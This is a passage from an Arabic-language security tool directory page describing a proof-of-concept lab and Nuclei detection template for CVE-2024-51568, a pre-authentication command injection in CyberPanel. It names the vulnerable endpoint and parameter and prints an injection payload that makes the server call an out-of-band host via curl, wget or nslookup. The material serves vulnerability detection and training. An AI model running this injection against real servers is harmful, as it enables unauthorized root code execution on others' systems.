Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليممختبرات وتدريب عملي
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

بيئة إثبات المفهوم (PoC) وقالب Nuclei لاختبار CVE-2024-51568، وهي ثغرة حقن أوامر قبل المصادقة في CyberPanel، مما يتيح تنفيذ أكواد عن بُعد بصلاحيات الجذر.

عرض المستودع
113منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-51568 - إثبات المفهوم لحقن الأوامر في CyberPanel

بيئة إثبات مفهوم وقالب Nuclei لاختبار CVE-2024-51568، وهي ثغرة حقن أوامر حرجة قبل المصادقة في CyberPanel.

تفاصيل الثغرة

  • CVE: CVE-2024-51568
  • الشدة: حرجة (CVSS 9.8)
  • النوع: حقن أوامر قبل المصادقة
  • نقطة النهاية: /filemanager/upload
  • المعامل: completePath
  • التأثير: تنفيذ أكواد عن بُعد بصلاحيات الجذر

بداية سريعة

1. تشغيل البيئة الضعيفة

root@kitploit:~
cd docker/
docker-compose up -d --build

2. التحقق من تشغيل CyberPanel

root@kitploit:~
curl -I http://localhost:8090

3. اختبار الثغرة

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

مخرجات عينة:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

كيف يعمل

الثغرة

يحتوي CyberPanel الإصدار v2.3.4 على خلل في حقن الأوامر في وظيفة رفع الملفات:

  1. نقطة النهاية: POST /filemanager/upload
  2. المعامل: completePath في بيانات نموذج متعدد الأجزاء
  3. الحقن: يتم تنفيذ الأوامر عبر ProcessUtilities.outputExecutioner()
  4. التجاوز: لا حاجة للمصادقة بسبب تجاوز الوسيطة

قالب Nuclei:

  1. استخراج رمز CSRF من طلب GET الأولي
  2. إرسال رفع ملف ضار يحتوي على أمر محقون في completePath
  3. استخدام Interactsh للكشف خارج النطاق (استدعاءات HTTP/DNS)
  4. الكشف عن التنفيذ الناجح عندما يتصل الخادم بعنوان URL الخاص بـ Interactsh

الحمولة الكشفية

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

تضمن هذه الحمولة الكشف الموثوق عبر تكوينات النظام المختلفة.

التهيئة

الوصول إلى CyberPanel

  • URL: http://localhost:8090
  • Admin: admin
  • Password: 1234567

المراجع

  • البحث الأصلي
  • وحدة Metasploit
  • تفاصيل CVE

إشعار أمني

تحتوي هذه البيئة على ثغرات متعمدة لأغراض البحث الأمني والتعليم:

  • لا تنشر في بيئة الإنتاج
  • لا تعرض لشبكات عامة
  • لا تستخدم على أنظمة لا تملكها
  • استخدم فقط لاختبارات الأمن المصرح بها

إخلاء مسؤولية

يُقدم إثبات المفهوم هذا للأغراض التعليمية واختبارات الأمن المصرح بها فقط. يتحمل المستخدمون مسؤولية الامتثال للقوانين المعمول بها والحصول على الإذن المناسب قبل الاختبار.

تنزيل الأداة